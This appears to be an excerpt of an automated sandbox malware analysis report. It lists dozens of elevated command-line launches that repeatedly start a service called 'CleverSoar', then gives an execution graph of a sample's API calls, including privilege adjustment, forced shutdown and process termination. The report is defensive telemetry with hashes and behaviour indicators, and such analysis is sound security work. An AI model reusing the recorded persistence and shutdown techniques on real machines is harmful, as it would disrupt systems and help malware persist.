                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:66
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:67
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:68
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:69
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:70
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:71
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:72
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:73
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:74
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:75
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:76
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:77
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:78
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:79
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:80
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:81
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:82
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:83
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:84
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:85
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:86
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:87
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:88
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:89
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:90
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:91
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:92
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:93
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:94
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:95
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:96
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:97
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:98
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:99
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:100
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:101
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:102
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:103
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:104
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:105
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:106
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:107
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:108
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:1.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:15.5%
                                          Total number of Nodes:792
                                          Total number of Limit Nodes:13
100820 6cae7090 77 API calls 100820->100840 100821 6cc45240 4 API calls 100821->100819 100822 6cc45240 4 API calls 100841 6cad1dd9 100822->100841 100823 6cad211c 100823->100797 100824 6cad241a 100823->100824 100827 6cc30390 11 API calls 100824->100827 100825 6cc3aec0 2 API calls 100825->100852 100826 6cb0e010 67 API calls 100826->100840 100830 6cad244d 100827->100830 100828->100819 100828->100821 100829 6cac6722 100959 6cc41880 25 API calls 4 library calls 100829->100959 100968 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100830->100968 100832 6cad2452 Sleep 100832->100797 100833->100822 100833->100823 100845 6cad16ac 100833->100845 100834 6cac6162 100835 6cac740b 100836 6cc44ff0 4 API calls 100835->100836 100844 6cac775a _strlen 100836->100844 100837 6cc45240 4 API calls 100837->100823 100838 6cae6ba0 104 API calls 100838->100852 100839 6cae6e60 32 API calls 100839->100852 100840->100792 100840->100802 100840->100805 100840->100809 100840->100816 100840->100817 100840->100820 100840->100826 100840->100829 100840->100834 100841->100823 100841->100837 100842 6cae7090 77 API calls 100842->100852 100843 6cb0e010 67 API calls 100843->100852 100844->100792 100846 6cac7ba9 100844->100846 100847 6cac7b92 100844->100847 100850 6cac7b43 _Yarn 100844->100850 100849 6cc46a43 std::_Facet_Register 4 API calls 100846->100849 100848 6cc46a43 std::_Facet_Register 4 API calls 100847->100848 100848->100850 100849->100850 100851 6cc3aec0 2 API calls 100850->100851 100861 6cac7be7 std::ios_base::_Ios_base_dtor 100851->100861 100852->100792 100852->100825 100852->100838 100852->100839 100852->100842 100852->100843 100853 6cc44ff0 4 API calls 100864 6cac8a07 100853->100864 100854 6cac9d7f 100858 6cc46a43 std::_Facet_Register 4 API calls 100854->100858 100855 6cac9d68 100857 6cc46a43 std::_Facet_Register 4 API calls 100855->100857 100856 6cac962c _strlen 100856->100792 100856->100854 100856->100855 100859 6cac9d18 _Yarn 
100856->100859 100857->100859 100858->100859 100860 6cc3aec0 2 API calls 100859->100860 100867 6cac9dbd std::ios_base::_Ios_base_dtor 100860->100867 100861->100792 100861->100853 100861->100856 100862 6cac8387 100861->100862 100863 6cc44ff0 4 API calls 100872 6cac9120 100863->100872 100864->100863 100865 6cc44ff0 4 API calls 100882 6caca215 _strlen 100865->100882 100866 6cc44ff0 4 API calls 100869 6cac9624 100866->100869 100867->100792 100867->100865 100873 6cace8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100867->100873 100868 6cc46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100868->100873 100960 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100869->100960 100871 6cc3aec0 2 API calls 100871->100873 100872->100866 100873->100792 100873->100868 100873->100871 100874 6cacf7b1 100873->100874 100875 6caced02 Sleep 100873->100875 100961 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100874->100961 100894 6cace8c1 100875->100894 100877 6caca9bb 100881 6cc46a43 std::_Facet_Register 4 API calls 100877->100881 100878 6caca9a4 100880 6cc46a43 std::_Facet_Register 4 API calls 100878->100880 100879 6cace8dd GetCurrentProcess TerminateProcess 100879->100873 100889 6caca953 _Yarn _strlen 100880->100889 100881->100889 100882->100792 100882->100877 100882->100878 100882->100889 100883 6cc44ff0 4 API calls 100883->100894 100884 6cacfbb8 100885 6cacfbe8 ExitWindowsEx Sleep 100884->100885 100885->100802 100886 6cacf7c0 100886->100884 100887 6cacb009 100891 6cc46a43 std::_Facet_Register 4 API calls 100887->100891 100888 6cacaff0 100890 6cc46a43 std::_Facet_Register 4 API calls 100888->100890 100889->100810 100889->100887 100889->100888 100892 6cacafa0 _Yarn 100889->100892 100890->100892 100891->100892 100893 6cc45960 104 API calls 100892->100893 100895 6cacb059 std::ios_base::_Ios_base_dtor 
_strlen 100893->100895 100894->100873 100894->100879 100894->100883 100895->100792 100896 6cacb42c 100895->100896 100897 6cacb443 100895->100897 100900 6cacb3da _Yarn _strlen 100895->100900 100898 6cc46a43 std::_Facet_Register 4 API calls 100896->100898 100899 6cc46a43 std::_Facet_Register 4 API calls 100897->100899 100898->100900 100899->100900 100900->100810 100901 6cacb79e 100900->100901 100902 6cacb7b7 100900->100902 100905 6cacb751 _Yarn 100900->100905 100903 6cc46a43 std::_Facet_Register 4 API calls 100901->100903 100904 6cc46a43 std::_Facet_Register 4 API calls 100902->100904 100903->100905 100904->100905 100906 6cc45960 104 API calls 100905->100906 100907 6cacb804 std::ios_base::_Ios_base_dtor _strlen 100906->100907 100907->100792 100908 6cacbc0f 100907->100908 100909 6cacbc26 100907->100909 100912 6cacbbbd _Yarn _strlen 100907->100912 100910 6cc46a43 std::_Facet_Register 4 API calls 100908->100910 100911 6cc46a43 std::_Facet_Register 4 API calls 100909->100911 100910->100912 100911->100912 100912->100810 100913 6cacc08e 100912->100913 100914 6cacc075 100912->100914 100917 6cacc028 _Yarn 100912->100917 100916 6cc46a43 std::_Facet_Register 4 API calls 100913->100916 100915 6cc46a43 std::_Facet_Register 4 API calls 100914->100915 100915->100917 100916->100917 100918 6cc45960 104 API calls 100917->100918 100923 6cacc0db std::ios_base::_Ios_base_dtor _strlen 100918->100923 100919 6cacc7bc 100922 6cc46a43 std::_Facet_Register 4 API calls 100919->100922 100920 6cacc7a5 100921 6cc46a43 std::_Facet_Register 4 API calls 100920->100921 100930 6cacc753 _Yarn _strlen 100921->100930 100922->100930 100923->100792 100923->100919 100923->100920 100923->100930 100924 6cacd3ed 100926 6cc46a43 std::_Facet_Register 4 API calls 100924->100926 100925 6cacd406 100927 6cc46a43 std::_Facet_Register 4 API calls 100925->100927 100928 6cacd39a _Yarn 100926->100928 100927->100928 100929 6cc45960 104 API calls 100928->100929 100931 6cacd458 std::ios_base::_Ios_base_dtor _strlen 
100929->100931 100930->100810 100930->100924 100930->100925 100930->100928 100936 6caccb2f 100930->100936 100931->100792 100932 6cacd8bb 100931->100932 100933 6cacd8a4 100931->100933 100937 6cacd852 _Yarn _strlen 100931->100937 100935 6cc46a43 std::_Facet_Register 4 API calls 100932->100935 100934 6cc46a43 std::_Facet_Register 4 API calls 100933->100934 100934->100937 100935->100937 100937->100810 100938 6cacdccf 100937->100938 100939 6cacdcb6 100937->100939 100942 6cacdc69 _Yarn 100937->100942 100941 6cc46a43 std::_Facet_Register 4 API calls 100938->100941 100940 6cc46a43 std::_Facet_Register 4 API calls 100939->100940 100940->100942 100941->100942 100943 6cc45960 104 API calls 100942->100943 100945 6cacdd1c std::ios_base::_Ios_base_dtor 100943->100945 100944 6cc44ff0 4 API calls 100944->100873 100945->100792 100945->100944 100947 6cc45156 100946->100947 100948 6cc451e8 OpenServiceA 100947->100948 100949 6cc4522f 100947->100949 100948->100947 100949->100840 100956 6cc303a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100950->100956 100951 6cc3310e CloseHandle 100951->100956 100952 6cc33f5f CloseHandle 100952->100956 100953 6cad37cb 100958 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100953->100958 100954 6cc1c1e0 WriteFile WriteFile WriteFile ReadFile 100954->100956 100955 6cc3251b CloseHandle 100955->100956 100956->100951 100956->100952 100956->100953 100956->100954 100956->100955 100971 6cc1b730 100956->100971 100958->100808 100959->100835 100960->100856 100961->100886 100965 6cc452a0 std::locale::_Setgloballocale 100962->100965 100963 6cc45277 CloseHandle 100963->100965 100964 6cc45320 Process32NextW 100964->100965 100965->100963 100965->100964 100966 6cc453b1 100965->100966 100967 6cc45345 Process32FirstW 100965->100967 100966->100815 100967->100965 100968->100832 100970->100814 100972 6cc1b743 _Yarn __wsopen_s std::locale::_Setgloballocale 100971->100972 100973 6cc1c180 100972->100973 
100974 6cc1bced CreateFileA 100972->100974 100976 6cc1aa30 100972->100976 100973->100956 100974->100972 100977 6cc1aa43 __wsopen_s std::locale::_Setgloballocale 100976->100977 100978 6cc1b3e9 WriteFile 100977->100978 100979 6cc1b43d WriteFile 100977->100979 100980 6cc1b718 100977->100980 100981 6cc1ab95 ReadFile 100977->100981 100978->100977 100979->100977 100980->100972 100981->100977
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: HR^
                                          • API String ID: 4218353326-1341859651
                                          • Opcode ID: 9f938ec4b4a4507f114673b1ccc16e25d74e78e61d576f8e6312f8572375689b
                                          • Instruction ID: 23d7c5a5d5d7e93e778c4b05745a0efcd8b1d9721196d815e746cae90fe016b0
                                          • Opcode Fuzzy Hash: 9f938ec4b4a4507f114673b1ccc16e25d74e78e61d576f8e6312f8572375689b
                                          • Instruction Fuzzy Hash: 26740471745B028FC728CF28C8D0695B7F3EF95318B1D8A2DC0A68BA55E774B58ACB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
